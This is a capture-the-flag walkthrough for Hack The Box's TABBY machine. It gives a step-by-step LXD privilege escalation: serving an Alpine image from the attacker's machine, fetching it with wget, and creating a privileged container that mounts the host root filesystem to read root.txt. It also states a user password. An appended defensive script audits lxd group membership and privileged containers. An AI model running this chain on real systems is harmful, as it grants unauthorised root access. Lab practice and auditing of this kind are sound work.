TABBY Hack The Box Walkthrough for Root Flag

This is a walkthrough (solution) for the root flag of the machine TABBY on Hack The Box. TABBY is a Linux-based machine on which we have to own both user and root. Its difficulty level is easy. Its IP was 10.10.10.194 for me; yours may differ depending on your account.

The link for the machine is https://www.hackthebox.eu/home/machines/profile/259. Please go through the steps to get the user flag first, before following the steps below.

Steps to Get the Root Flag of the Machine

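1. Running the id command as the ash user shows that ash is a member of the lxd group, so we attempt privilege escalation through LXD. Members of this group can create privileged containers and mount the host filesystem into them, which is what the following steps do. Start by entering the following commands on your local system.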

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder/
sudo bash build-alpine

2. The build creates the Alpine image as a tar.gz file.

3. Now copy this tar.gz file to the /var/www/html folder using the command shown below.

sudo cp alpine-v3.12-x86_64-20200806_0441.tar.gz /var/www/html

Replace the alpine tar.gz file name with the name of the file generated on your local system.

4. Restart the Apache server so that it hosts the file, using the following command.

sudo service apache2 restart

5. Go to the terminal that holds the shell on the machine and enter the following command to switch to the ash user.

su ash

This will ask for a password; enter the password “admin@it”. As ash we have write permission in the ash home directory, and that is where we will download the file. Switch to the ash user’s home directory using the following command.

cd /home/ash

6. Now that we are in the home directory of ash, we can download the alpine tar.gz file. Use the following command to download it into the ash user’s home directory.

wget http://<hackthebox_ip>/alpine-v3.12-x86_64-20200806_0441.tar.gz

Replace <hackthebox_ip> with your own Hack The Box IP address.

7. After downloading the tar.gz file, import it as a new lxc image with the alias liquid, using the following command.

lxc image import ./alpine-v3.12-x86_64-20200806_0441.tar.gz --alias liquid

Replace the alpine tar.gz file name with the name of the file generated on your local system.

8. List the images to check whether the image was created successfully, using the following command.

lxc image list

9. Now that all the setup is done, it’s time to initialize lxd with the following command.

lxd init

10. Enter the following command to create a container named privesc from the liquid image with security.privileged set to true.

lxc init liquid privesc -c security.privileged=true

11. Add a disk device to the container that mounts the host’s root filesystem (source=/) at /mnt/root inside it.

lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true

12. Enter the following commands to start the container and get a terminal inside it.

lxc start privesc
lxc exec privesc /bin/sh
id

13. The output of the id command confirms that we are now logged in as root.

14. Enter the following commands to get the hash of the root flag.

cd /mnt/root
cd root
ls
cat root.txt

And there we go: we now have the flags for both user and root.
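
From the defender's side, the two conditions this escalation relies on can be audited: which accounts are members of the lxd group, and which instances are privileged or have the host root mounted as a disk device. The shell helpers below are an added example, not part of the original walkthrough; the function names, the sample group file and the sample expanded instance config are constructed for illustration.

```shell
#!/bin/sh
# Added audit example; all sample data below is constructed.
# Live use: getent group lxd | group_members lxd
#           lxc config show NAME --expanded | audit_instance

# Members of group $1, one per line, from /etc/group-format text on stdin.
group_members() {
    awk -F: -v g="$1" '$1 == g && $4 != "" {
        n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i] }'
}

# Findings for one instance, from its expanded YAML config on stdin.
audit_instance() {
    awk '
        /^[^ ]/ { section = $1 }             # top-level key: config:, devices:, ...
        { val = $2; gsub(/"/, "", val) }     # value with YAML quotes stripped
        section == "config:" && $1 == "security.privileged:" && val == "true" {
            print "PRIVILEGED"
        }
        section == "devices:" && /^  [^ ]/ { # two-space indent: a device name
            dev = $1; sub(/:$/, "", dev); order[++n] = dev
        }
        section == "devices:" && $1 == "type:"   { dtype[dev] = val }
        section == "devices:" && $1 == "source:" { src[dev] = val }
        END {
            for (i = 1; i <= n; i++)
                if (dtype[order[i]] == "disk" && src[order[i]] == "/")
                    print "HOST_ROOT_DISK " order[i]
        }'
}

sample_group() { cat <<'EOF'
root:x:0:
lxd:x:116:ash
EOF
}

sample_config() { cat <<'EOF'
config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false
EOF
}
```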



